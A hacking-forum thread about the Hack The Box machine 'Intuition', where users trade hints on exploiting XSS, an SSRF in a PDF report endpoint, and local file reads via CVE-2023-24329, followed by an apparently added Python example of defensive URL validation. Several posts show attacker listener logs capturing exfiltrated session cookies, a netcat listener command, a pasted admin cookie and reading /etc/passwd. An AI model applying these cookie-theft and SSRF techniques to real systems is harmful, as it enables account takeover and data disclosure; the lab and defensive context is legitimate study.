HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
#41
After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download a file from our URL and create a PDF.

Has anyone found a way to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge. I found an article: https://4xura.com/ctf/htb/htb-writeup-web-pdfy/
Reply
#42
can they please fix this stupid box. so frustrating.
Reply
#43
(Apr 28, 2024, 05:53 AM)mycatdante Wrote: After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download a file from our URL and create a PDF.

Has anyone found a way to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge. I found an article: https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?
Reply
#44
(Apr 28, 2024, 06:04 AM)meoami Wrote:
(Apr 28, 2024, 05:53 AM)mycatdante Wrote: After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download a file from our URL and create a PDF.

Has anyone found a way to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge. I found an article: https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?

I am working on it. Good news is that I tried the way the article introduces:

I made an index.html with an <iframe> tag. I put our IP inside the tag and the server requests a 2nd time, and I think it's the SSRF. Still figuring out how to get the 2nd cookie or other thing.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.177.46 - - [28/Apr/2024 02:06:49] "GET / HTTP/1.1" 200 -      <- 1st request
10.129.177.46 - - [28/Apr/2024 02:06:51] "GET /?cookie=+document.cookie HTTP/1.1" 200 -     <- 2nd request SSRF
Reply
#45
If anyone is stuck on this XSS
admin cookie eyJ1c2VyX2lkIjogNiwgInVzZXJuYW1lIjogIjEyMzQiLCAicm9sZSI6ICJ1c2VyIn18NTQ5ZGU5NjRjY2NlOGE4NDI4ZTA0ZGMwNzU2ZGE4YmI5NzA1ODlkOTEzYjI0Y2Y5OGZlYTliNzM3Y2E3ZjY5NA==
Try it; if it works, move on to http://dashboard.comprezzor.htb/create_pdf_report
Reply
#46
anything for root?
Reply
#47
(Apr 28, 2024, 06:04 AM)meoami Wrote:
(Apr 28, 2024, 05:53 AM)mycatdante Wrote: After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download a file from our URL and create a PDF.

Has anyone found a way to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge. I found an article: https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?

When you get the first webdav user,
again
POST a report with some text and payload <img....>
then on the dashboard set the priority of this new report to high :)
Reply
#48
Hmm, I just run
nc -nvlp 80
and provide the URL to my server as a param, then I found the cookie sent as a header

Listening on 0.0.0.0 80
Connection received on 10.10.11.15 44208
GET / HTTP/1.1
Accept-Encoding: identity
Host: 10.10.15.3
User-Agent: Python-urllib/3.11
Cookie: user_data=eyJ1c2VyX2lkIjo
Connection: close

I use it to access the dashboard; this cookie is for admin.
Then I found LFI by SSRF, identified by CVE-2023-24329. I tried this because of the User-Agent header, and now we have LFI.
I downloaded /etc/passwd as a PDF, checked its content and metadata, and found it was generated by wkhtmltopdf 0.12.6.

Any hint for getting a shell?
Reply
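A defender's view of what post #48 reports (a Python-urllib fetch of a caller-supplied URL that carried the session cookie and reached local files), as an added example that is not code from the thread or from the box. The function names, the hostnames and the offline resolver stub are hypothetical and constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}            # allowlist, never a blocklist
AMBIENT_HEADERS = {"cookie", "authorization"}  # must not leave the server


def validate_report_url(raw, resolver=socket.getaddrinfo):
    """Return the URL unchanged if it is safe to fetch, else raise ValueError."""
    # Reject (do not repair) blanks and control characters before parsing:
    # CVE-2023-24329 is about URLs starting with blank characters getting
    # past urllib.parse-based scheme and host filters.
    if not isinstance(raw, str) or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in raw):
        raise ValueError("blank or control character in URL")
    parts = urlsplit(raw)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed")
    if not parts.hostname or parts.username or parts.password:
        raise ValueError("missing host or embedded credentials")
    port = parts.port or (443 if scheme == "https" else 80)
    # Every address the name resolves to must be publicly routable; this
    # blocks loopback, RFC 1918, link-local and similar internal targets.
    for info in resolver(parts.hostname, port, type=socket.SOCK_STREAM):
        if not ipaddress.ip_address(info[4][0]).is_global:
            raise ValueError("resolves to a non-public address")
    return raw


def outbound_headers(request_headers):
    """Drop the caller's session material before the server-side fetch."""
    return {k: v for k, v in request_headers.items() if k.lower() not in AMBIENT_HEADERS}


def static_resolver(table):
    """Constructed offline stand-in for socket.getaddrinfo (demo only)."""
    def resolve(host, port, type=0):
        # Hosts missing from the table are treated as IP literals.
        return [(socket.AF_INET, type, 6, "", (ip, port)) for ip in table.get(host, [host])]
    return resolve


def is_allowed(url, resolver):
    """Boolean wrapper around validate_report_url for policy checks."""
    try:
        validate_report_url(url, resolver)
        return True
    except ValueError:
        return False
```

In a real fetcher, connect to the address that was validated and either disable redirects or re-validate every hop, otherwise a second DNS answer or a 302 undoes the check.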
#49
Intuition writeup

https://hackthesquare.mysellix.io/produc...on-writeup

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB
Reply
#50
(Apr 28, 2024, 07:34 AM)andlommy Wrote: user, finally
use the SSRF to find application code
use that same ssrf to access the next hop (http is not the only protocol ;)
convert key
profit.

now for the root....

How do you know the location of the source code?
Reply